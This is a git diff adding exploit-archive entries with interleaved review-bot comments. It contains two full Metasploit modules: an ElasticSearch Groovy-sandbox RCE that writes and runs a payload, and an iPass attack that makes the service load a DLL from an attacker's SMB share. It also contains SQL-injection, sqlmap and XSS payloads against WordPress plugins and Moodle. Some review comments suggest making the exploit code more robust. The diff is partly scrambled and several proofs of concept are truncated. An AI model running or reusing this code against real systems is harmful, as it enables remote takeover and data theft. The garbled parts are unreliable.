diff --git a/files.csv b/files.csv
index 5c2140517..a02644605 100755
--- a/files.csv
+++ b/files.csv
@@ -32833,3 +32833,9 @@ id,file,description,date,author,platform,type,port
 36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 'pretty-bar.php' Cross Site Scripting Vulnerability",2011-12-06,Am!r,php,webapps,0
 36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 ''fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
 36411,platforms/windows/shellcode/36411.txt,"Shellcode Win x86-64 - Download & execute (Generator)",2015-03-16,"Ali Razmjoo",windows,shellcode,0
+36412,platforms/windows/remote/36412.rb,"IPass Control Pipe Remote Command Execution",2015-03-16,metasploit,windows,remote,0
+36413,platforms/aix/dos/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",aix,dos,0
+36414,platforms/php/webapps/36414.txt,"WordPress WPML - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80
+36415,platforms/java/remote/36415.rb,"ElasticSearch Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200
+36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0
+36418,platforms/php/webapps/36418.txt,"Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting",2015-03-17,LiquidWorm,php,webapps,0
diff --git a/platforms/aix/dos/36413.txt b/platforms/aix/dos/36413.txt
new file mode 100755
index 000000000..c694dbdf3
--- /dev/null
+++ b/platforms/aix/dos/36413.txt
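Review bot: The new 36413 row files a WordPress PHP plugin blind SQL injection under `platforms/aix/dos/36413.txt` with platform `aix` and type `dos`, while the sibling WordPress entries added in the same hunk (36414, 36418) use `php`/`webapps`, and the advisory itself describes an authenticated SQLi, not a denial of service or anything AIX-specific. Anyone filtering the index by platform or type will miss it. Suggested row: `36413,platforms/php/webapps/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0`, with the file moved to match. The port column is also inconsistent within the hunk (36414 gets 80, the other web entries 0), though that may just be corpus convention.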
@@ -0,0 +1,74 @@ +Title: WordPress SEO by Yoast <= 1.7.3.3 - Blind SQL Injection +Version/s Tested: 1.7.3.3 +Patched Version: 1.7.4 +CVSSv2 Base Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C) +CVSSv2 Temporal Score: 7 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C) +WPVULNDB: https://wpvulndb.com/vulnerabilities/7841 + +Description: + +WordPress SEO by Yoast is a popular WordPress plugin (wordpress-seo) used +to improve the Search Engine Optimization (SEO) of WordPress sites. The +latest version at the time of writing (1.7.3.3) has been found to be +affected by two authenticated (admin, editor or author user) Blind SQL +Injection vulnerabilities. The plugin has more than one million downloads +according to WordPress. + +Technical Description: + +The authenticated Blind SQL Injection vulnerability can be found within the +'admin/class-bulk-editor-list-table.php' file. The orderby and order GET +parameters are not sufficiently sanitised before being used within a SQL +query. + +Line 529: + +$orderby = ! empty( $_GET['orderby'] ) ? esc_sql( sanitize_text_field( +$_GET['orderby'] ) ) : 'post_title'; + +Line 533: + +order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) ); + +If the GET orderby parameter value is not empty it will pass its value +through WordPess's own esc_sql() function. According to WordPress this +function 'Prepares a string for use as an SQL query. A glorified +addslashes() that works with arrays.'. However, this is not sufficient to +prevent SQL Injection as can be seen from our Proof of Concept. + +Proof of Concept (PoC): + +The following GET request will cause the SQL query to execute and sleep for +10 seconds if clicked on as an authenticated admin, editor or author user. 
+ +http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc + +Using SQLMap: + +python sqlmap.py -u " +http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date*&order=asc" +--batch --technique=B --dbms=MySQL --cookie="wordpress_9d...; +wordpress_logged_in_9dee67...;" + +Impact: + +As there is no anti-CSRF protection a remote unauthenticated attacker could +use this vulnerability to execute arbitrary SQL queries on the victim +WordPress web site by enticing an authenticated admin, editor or author +user to click on a specially crafted link or visit a page they control. + +One possible attack scenario would be an attacker adding their own +administrative user to the target WordPress site, allowing them to +compromise the entire web site. + +Timeline: + +March 10th 2015 - 15:30 GMT: Vulnerability discovered by Ryan Dewhurst +(WPScan Team - Dewhurst Security). +March 10th 2015 - 18:30 GMT: Technical review by FireFart (WPScan Team). +March 10th 2015 - 20:00 GMT: Vendor contacted via email. +March 10th 2015 - 21:25 GMT: Vendor replies, confirms issue and gave +expected patch timeline. +March 11th 2015 - 12:05 GMT: Vendor released version 1.7.4 which patches +this issue. +March 11th 2015 - 12:30 GMT: Advisory released. \ No newline at end of file diff --git a/platforms/java/remote/36415.rb b/platforms/java/remote/36415.rb new file mode 100755 index 000000000..8eefab764 --- /dev/null +++ b/platforms/java/remote/36415.rb 
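Review bot: Remediation guidance is missing, and it matters here because the root cause shown at line 529 is that `esc_sql()` (addslashes-style quoting) is applied to a value interpolated as an ORDER BY identifier, where no quote character is needed to break out — the PoC value `post_date,(select * from (select(sleep(10)))a)` contains nothing esc_sql would ever touch. The advisory should say what a correct fix looks like, e.g. "compare `$_GET['orderby']` against an allow-list of column names and `$_GET['order']` against `ASC`/`DESC`, rejecting anything else", so readers do not conclude that stronger escaping is the answer. The quoted line 533 reads `order = esc_sql(...)`, presumably a transcription slip for `$order = esc_sql(...)`. The description also claims two injection points but the PoC only exercises `orderby`; a one-line `order=` payload would make that claim verifiable.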
@@ -0,0 +1,202 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::FileDropper + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ElasticSearch Search Groovy Sandbox Bypass', + 'Description' => %q{ + This module exploits a remote command execution (RCE) vulnerability in ElasticSearch, + exploitable by default on ElasticSearch prior to 1.4.3. The bug is found in the + REST API, which does not require authentication, where the search function allows + groovy code execution and its sandbox can be bypassed using java.lang.Math.class.forName + to reference arbitrary classes. It can be used to execute arbitrary Java code. This + module has been tested successfully on ElasticSearch 1.4.2 on Ubuntu Server 12.04. + }, + 'Author' => + [ + 'Cameron Morris', # Vulnerability discovery + 'Darren Martyn', # Public Exploit + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2015-1427'], + ['URL', 'https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/'], + ['URL', 'https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch'], + ['URL', 'http://drops.wooyun.org/papers/5107'] + ], + 'Platform' => 'java', + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + ['ElasticSearch 1.4.2', {}] + ], + 'DisclosureDate' => 'Feb 11 2015', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(9200), + OptString.new('TARGETURI', [true, 'The path to the ElasticSearch REST API', "/"]) + ], self.class) + end + + def check + result = Exploit::CheckCode::Safe + + if vulnerable? + result = Exploit::CheckCode::Vulnerable + end + + result + end + + def exploit + print_status("#{peer} - Checking vulnerability...") + unless vulnerable? 
+ fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...") + end + + print_status("#{peer} - Discovering TEMP path...") + res = execute(java_tmp_dir) + tmp_dir = parse_result(res) + if tmp_dir.nil? + fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...") + else + print_good("#{peer} - TEMP path on '#{tmp_dir}'") + end + + print_status("#{peer} - Discovering remote OS...") + res = execute(java_os) + os = parse_result(res) + if os.nil? + fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...") + else + print_good("#{peer} - Remote OS is '#{os}'") + end + + if os =~ /win/i + tmp_file = "#{tmp_dir}#{rand_text_alpha(4 + rand(4))}.jar" + else + tmp_file = File.join(tmp_dir, "#{rand_text_alpha(4 + rand(4))}.jar") + end + + register_files_for_cleanup(tmp_file) + + print_status("#{peer} - Trying to load metasploit payload...") + java = java_load_class(os, tmp_file) + execute(java) + end + + def vulnerable? + java = 'java.lang.Math.class.forName("java.lang.Runtime")' + + vprint_status("#{peer} - Trying to get a reference to java.lang.Runtime...") + res = execute(java) + result = parse_result(res) + + if result.nil? + vprint_status("#{peer} - no response to test") + return false + elsif result == 'class java.lang.Runtime' + return true + end + + false + end + + def parse_result(res) + unless res + vprint_error("#{peer} - No response") + return nil + end + + unless res.code == 200 && res.body + vprint_error("#{peer} - Target answered with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)") + return nil + end + + begin + json = JSON.parse(res.body.to_s) + rescue JSON::ParserError + return nil + end + + begin + result = json['hits']['hits'][0]['fields']['msf_result'] + rescue + return nil + end + + result.is_a?(::Array) ? 
result.first : result + end + + def java_tmp_dir + 'java.lang.Math.class.forName("java.lang.System").getProperty("java.io.tmpdir")' + end + + def java_os + 'java.lang.Math.class.forName("java.lang.System").getProperty("os.name")' + end + + def java_load_class(os, tmp_file) + if os =~ /win/i + tmp_file.gsub!(/\\/, '\\\\\\\\') + end + + java = [ + 'c=java.lang.Math.class.forName("java.io.FileOutputStream");', + 'b64=java.lang.Math.class.forName("sun.misc.BASE64Decoder");', + "i=c.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\");", + 'b64_i=b64.newInstance();', + "i.write(b64_i.decodeBuffer(\"#{Rex::Text.encode_base64(payload.encoded)}\"));", + 'loader_class=java.lang.Math.class.forName("java.net.URLClassLoader");', + 'file_class=java.lang.Math.class.forName("java.io.File");', + "file_url=file_class.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\").toURI().toURL();", + 'loader=loader_class.newInstance();', + 'loader.addURL(file_url);', + 'm=loader.loadClass(\'metasploit.Payload\');', + 'm.main(null);' + ] + + java.join + end + + def execute(java, timeout = 20) + payload = { + "size" => 1, + "query" => { + "filtered" => { + "query" => { + "match_all" => {} + } + } + }, + "script_fields" => { + "msf_result" => { + "script" => java + } + } + } + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, "_search"), + 'method' => 'POST', + 'data' => JSON.generate(payload) + }, timeout) + + res + end + +end \ No newline at end of file diff --git a/platforms/php/webapps/36414.txt b/platforms/php/webapps/36414.txt new file mode 100755 index 000000000..362cdbdf8 --- /dev/null +++ b/platforms/php/webapps/36414.txt 
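Review bot: `java_load_class` rewrites `tmp_file` in place with `tmp_file.gsub!(/\\/, '\\\\\\\\')`, but `exploit` has already passed that same String object to `register_files_for_cleanup(tmp_file)`, so on Windows targets the cleanup list presumably ends up holding the doubled-backslash form rather than the real path; use a non-destructive copy for the Groovy string instead: `escaped = os =~ /win/i ? tmp_file.gsub(/\\/, '\\\\\\\\') : tmp_file` and interpolate `escaped` in the `newInstance(...)` calls. The final `execute(java)` in `exploit` discards its response, so a failed write or class load is never reported to the operator; at least log the HTTP status via `parse_result`, bearing in mind a successful `m.main(null)` may hold the request open until the 20-second timeout. The payload path also depends on the JDK-internal `sun.misc.BASE64Decoder`, which is fine for the Java 7/8 runtimes ElasticSearch 1.4.x shipped against but is worth a comment such as `# sun.misc.BASE64Decoder is JDK-internal (removed in Java 9); targets of this era run Java 7/8`.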
@@ -0,0 +1,106 @@ +OVERVIEW +========== + +WPML is the industry standard for creating multi-lingual WordPress +sites. Three vulnerabilities were found in the plug-in. The most +serious of them, an SQL injection problem, allows anyone to read the +contents of the WordPress database, including user details and +password hashes, without authentication. + +System administrators should update to version 3.1.9.1 released +earlier this week to resolve the issues. + + + +DETAILS +======== + +1. SQL injection + +When WPML processed a HTTP POST request containing the parameter +”action=wp-link-ajax”, the current language is determined by parsing +the HTTP referer. The parsed language code is not checked for +validity, nor SQL-escaped. The user doesn’t need to be logged in. + +By sending a carefully crafted referer value with the mentioned POST +request parameter, an attacker can perform SQL queries on arbitrary +tables and retrieve their results. In addition to the standard +WordPress database and tables, the attacker may query all other +databases and tables accessible to the web backend. + +The following HTML snippet demonstrates the vulnerability: + + + +
+ + +
+ +The results of the SQL query will be shown in the comments feed XML-formatted. + + + +2. Page/post/menu deletion + +WPML contains a ”menu sync” function which helps site administrators +to keep WordPress menus consistent across different languages. This +functionality lacked any access control, allowing anyone to delete +practically all content of the website - posts, pages, and menus. + +Example: + +
+ + + +
+ +Submitting the above form would delete the row with the ID 12345 in +the wp_posts database. Several items be deleted with the same request. + + + +3. Reflected XSS + +The ”reminder popup” code intended for administrators in WPML didn’t +check for login status or nonce. An attacker can direct target users +to an URL like: + +https://YOUR.WORDPRESS.BLOG/?icl_action=reminder_popup&target=javascript%3Aalert%28%2Fhello+world%2f%29%3b%2f%2f + + +to execute JavaScript in their browser. This example bypasses the +Chrome XSS Auditor. + +In the case of WordPress, XSS triggered by an administrator can lead +to server-side compromise via the plugin and theme editors. + + + +CREDITS +======== + +The vulnerabilities were found by Jouko Pynnonen of Klikki Oy while +researching WordPress plugins falling in the scope of the Facebook bug +bounty program. + +The vendor was notified on March 02, 2015 and the patch was released +on March 10. + +Vendor advisory: http://wpml.org/2015/03/wpml-security-update-bug-and-fix/ + +An up-to-date version of this document can be found on our website +http://klikki.fi . + + +-- +Jouko Pynnönen +Klikki Oy - http://klikki.fi \ No newline at end of file diff --git a/platforms/php/webapps/36418.txt b/platforms/php/webapps/36418.txt new file mode 100755 index 000000000..c226b372a --- /dev/null +++ b/platforms/php/webapps/36418.txt 
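Review bot: The proof-of-concept material this advisory relies on is absent: "The following HTML snippet demonstrates the vulnerability:" (the unauthenticated SQL injection) and "Example:" (the menu-sync deletion) are each followed by nothing, so the two most serious findings cannot be reproduced or verified from this copy and only the XSS URL survives. Presumably the HTML forms were stripped on import; they should be restored, or at minimum the requests described in prose (`action=wp-link-ajax` plus the crafted `Referer` value carrying the SQL, and the menu-sync request naming the post ID to delete). For the XSS item it would help to state that `target` is placed into a navigation URL rather than reflected as markup, which is why a `javascript:` value rather than a `<script>` tag is used and why the Chrome XSS Auditor does not intervene. "Several items be deleted" should read "Several items can be deleted with the same request."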
@@ -0,0 +1,148 @@ +? +Moodle 2.5.9/2.6.8/2.7.5/2.8.3 Block Title Handler Cross-Site Scripting + + +Vendor: Moodle Pty Ltd +Product web page: https://www.moodle.org +Affected version: 2.8.3, 2.7.5, 2.6.8 and 2.5.9 + +Summary: Moodle is a learning platform designed to provide +educators, administrators and learners with a single robust, +secure and integrated system to create personalised learning +environments. + +Desc: Moodle suffers from persistent XSS vulnerabilities. Input +passed to the POST parameters 'config_title' and 'title' thru +index.php, are not properly sanitized allowing the attacker to +execute HTML or JS code into user's browser session on the affected +site. Affected components: Blocks, Glossary, RSS and Tags. + +Tested on: nginx + PHP/5.4.22 + + +Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2015-5236 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php + +Vendor Advisory ID: MSA-15-0013 +Vendor Advisory URL: https://moodle.org/mod/forum/discuss.php?d=307383 + +CVE ID: CVE-2015-2269 +CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2269 + + +09.02.2015 + +-- + + +Random Glossary Entry +--------------------- + +POST http://WEB/my/index.php HTTP/1.1 + + +_qf__block_glossary_random_edit_form=1 +bui_contexts=0 +bui_defaultregion=side-pre +bui_defaultweight=4 +bui_editid=304 +bui_editingatfrontpage=0 +bui_pagetypepattern=my-index +bui_parentcontextid=411 +bui_region=side-pre +bui_subpagepattern=%@NULL@% +bui_visible=1 +bui_weight=4 +config_addentry=test +config_invisible=test2 +config_refresh=0 +config_showconcept=1 +config_title=" onmouseover=prompt("XSS1") > +config_type=0 +config_viewglossary=test3 +mform_isexpanded_id_configheader=1 +mform_isexpanded_id_onthispage=0 +mform_isexpanded_id_whereheader=0 +sesskey=S8TXvxdEKF +submitbutton=Save changes + + +Remote RSS Feeds +---------------- + +POST http://WEB/my/index.php HTTP/1.1 + + 
+_qf__block_rss_client_edit_form=1 +bui_contexts=0 +bui_defaultregion=side-pre +bui_defaultweight=4 +bui_editid=312 +bui_editingatfrontpage=0 +bui_pagetypepattern=my-index +bui_parentcontextid=411 +bui_region=side-pre +bui_subpagepattern=%@NULL@% +bui_visible=1 +bui_weight=4 +config_block_rss_client_show_channel_image=0 +config_block_rss_client_show_channel_link=0 +config_display_description=0 +config_rssid=_qf__force_multiselect_submission +config_rssid[]=3 +config_shownumentries=11 +config_title=" onmouseover=prompt("XSS2") > +mform_isexpanded_id_configheader=1 +mform_isexpanded_id_onthispage=0 +mform_isexpanded_id_whereheader=0 +sesskey=S8TXvxdEKF +submitbutton=Save changes + + +Tags +---- + +POST http://WEB/my/index.php HTTP/1.1 + + +_qf__block_tags_edit_form=1 +bui_contexts=0 +bui_defaultregion=side-pre +bui_defaultweight=4 +bui_editid=313 +bui_editingatfrontpage=0 +bui_pagetypepattern=my-index +bui_parentcontextid=411 +bui_region=side-pre +bui_subpagepattern=%@NULL@% +bui_visible=1 +bui_weight=4 +config_numberoftags=80 +config_tagtype= +config_title=Tags" onmouseover=prompt("XSS3") > +mform_isexpanded_id_configheader=1 +mform_isexpanded_id_onthispage=0 +mform_isexpanded_id_whereheader=0 +sesskey=S8TXvxdEKF +submitbutton=Save changes + + +Older not supported versions +---------------------------- + +POST http://WEB/blog/index.php HTTP/1.1 + +blockaction=config +filterselect=1343 +filtertype=user +instanceid=4992 +numberoftags=20 +sesskey=0QCG5LQz0Q +sort=name +timewithin=90 +title=ZSL"> diff --git a/platforms/windows/local/36417.txt b/platforms/windows/local/36417.txt new file mode 100755 index 000000000..7c966d724 --- /dev/null +++ b/platforms/windows/local/36417.txt 
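Review bot: The preconditions are not stated: every request carries a valid `sesskey` and a `bui_editid` for an existing block instance, so this is a stored XSS by an authenticated user who can configure that block, not something an anonymous visitor can trigger, and the Desc should say so and say who sees the rendered title (presumably anyone viewing the page the block sits on; the `/my/index.php` dashboard examples would be self-XSS unless the block is placed on a shared page, which is worth confirming). The payloads `config_title=" onmouseover=prompt("XSS1") >` require a mouse-over to fire; that is cosmetic, but a variant that fires on render would make the impact easier to demonstrate. The final "Older not supported versions" request stops at `title=ZSL">`, which looks truncated — the tag that followed was probably stripped on import — so that PoC is incomplete in this copy.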
@@ -0,0 +1,53 @@ +? +Spybot Search & Destroy 1.6.2 Security Center Service Privilege Escalation + + +Vendor: Safer-Networking Ltd. +Product web page: http://www.safer-networking.org +Affected version: 1.6.2 + +Summary: Spybot – Search & Destroy (S&D) is a spyware and adware removal +computer program compatible with Microsoft Windows 95 and later. It scans +the computer hard disk and/or RAM for malicious software. + +Desc: The application suffers from an unquoted search path issue impacting +the service 'SBSDWSCService' for Windows deployed as part of Spybot S&D. +This could potentially allow an authorized but non-privileged local +user to execute arbitrary code with elevated privileges on the system. A +successful attempt would require the local user to be able to insert their +code in the system root path undetected by the OS or other security applications +where it could potentially be executed during application startup or reboot. +If successful, the local user’s code would execute with the elevated privileges +of the application. + +Tested on: Microsoft Windows Ultimate 7 SP1 (EN) + + +Vulnerability discovered by Aljaz Ceru + aljaz@insec.si + + +Advisory ID: ZSL-2015-5237 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5237.php + + +17.02.2015 + +--- + + +C:\Users\user>sc qc SBSDWSCService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: SBSDWSCService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : SBSD Security Center Service + DEPENDENCIES : wscsvc + SERVICE_START_NAME : LocalSystem + +C:\Users\user> diff --git a/platforms/windows/remote/36412.rb b/platforms/windows/remote/36412.rb new file mode 100755 index 000000000..deee20bfc --- /dev/null +++ b/platforms/windows/remote/36412.rb 
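Review bot: The "authorized but non-privileged local user" claim is not supported by what is shown: with `BINARY_PATH_NAME : C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe` unquoted, the service manager will try `C:\Program.exe`, then `C:\Program Files\Spybot.exe`, then `C:\Program Files\Spybot - Search.exe`, and on default ACLs as far as I know none of those locations is writable by a standard user (`C:\` root permits folder creation but not file creation for Authenticated Users, and `Program Files` is administrator-only). The advisory should state that exploitation requires write access to one of those path prefixes — e.g. via a misconfigured ACL — and show it, for instance with `icacls "C:\Program Files"` output alongside the `sc qc` output. Without that precondition this is a hardening finding (quote the path) rather than a demonstrated local privilege escalation, and the severity wording should reflect that.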
@@ -0,0 +1,114 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::SMB::Client::Authenticated + include Msf::Exploit::Remote::SMB::Server::Share + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'IPass Control Pipe Remote Command Execution', + 'Description' => %q{ + This module exploits a vulnerability in the IPass Client service. This service provides a + named pipe which can be accessed by the user group BUILTIN\Users. This pipe can be abused + to force the service to load a DLL from a SMB share. + }, + 'Author' => + [ + 'Matthias Kaiser', # Vulnerability discovery + 'h0ng10 ', # Metasploit Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2015-0925' ], + [ 'OSVDB', '117423' ], + [ 'BID', '72265' ], + [ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 2048, + 'DisableNops' => true + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows x32', { 'Arch' => ARCH_X86 } ], + [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] + ], + 'Privileged' => true, + 'DisclosureDate' => 'Jan 21 2015', + 'DefaultTarget' => 0)) + + register_options( + [ + OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15]) + ], self.class) + + deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME') + end + + def check + echo_value = rand_text_alphanumeric(rand(10) + 10) + + begin + response = send_command("System.Echo #{echo_value}") + if response =~ Regexp.new(echo_value) + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Unknown + end + rescue Rex::ConnectionError => e + 
vprint_error("Connection failed: #{e.class}: #{e}") + return Msf::Exploit::CheckCode::Unknown + rescue Rex::Proto::SMB::Exceptions::LoginError => e + vprint_error('Connection reset during login') + return Msf::Exploit::CheckCode::Unknown + end + end + + def setup + super + self.file_name = "#{Rex::Text.rand_text_alpha(7)}.dll" + self.share = Rex::Text.rand_text_alpha(5) + end + + def primer + self.file_contents = generate_payload_dll + print_status("File available on #{unc}...") + send_command("iPass.SWUpdateAssist.RegisterCOM #{unc}") + end + + def send_command(command) + # The connection is closed after each command, so we have to reopen it + connect + smb_login + pipe = simple.create_pipe('\\IPEFSYSPCPIPE') + pipe.write(Rex::Text.to_unicode(command)) + response = Rex::Text.to_ascii(pipe.read) + + response + end + + + def exploit + begin + Timeout.timeout(datastore['SMB_DELAY']) { super } + rescue Timeout::Error + # do nothing... just finish exploit and stop smb server... + end + end + +end \ No newline at end of file
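Review bot: `send_command` opens a fresh TCP connection and SMB session on every call (`connect` / `smb_login`) but never tears them down — the pipe handle is not closed and there is no `disconnect` — and it is invoked from both `check` and `primer`, so each reconnect simply abandons the previous socket; even if the service closes its end after a command, as the comment says, the client side should release its handle. Wrap the pipe I/O in `begin … ensure` so the pipe is closed and the session disconnected on every path, including when `pipe.read` raises. In `check`, `rescue Rex::Proto::SMB::Exceptions::LoginError => e` binds `e` but logs the fixed string `'Connection reset during login'`; either include `#{e}` in the message or drop the binding. `response =~ Regexp.new(echo_value)` can also be `response.include?(echo_value)`, since `echo_value` is plain alphanumeric and no pattern semantics are needed.
```ruby
  def send_command(command)
    # The connection is closed after each command, so we have to reopen it
    connect
    smb_login
    pipe = nil
    begin
      pipe = simple.create_pipe('\\IPEFSYSPCPIPE')
      pipe.write(Rex::Text.to_unicode(command))
      Rex::Text.to_ascii(pipe.read)
    ensure
      pipe.close if pipe   # release the pipe handle even if read/write raised
      disconnect           # drop the SMB session so repeated calls do not leak sockets
    end
  end
```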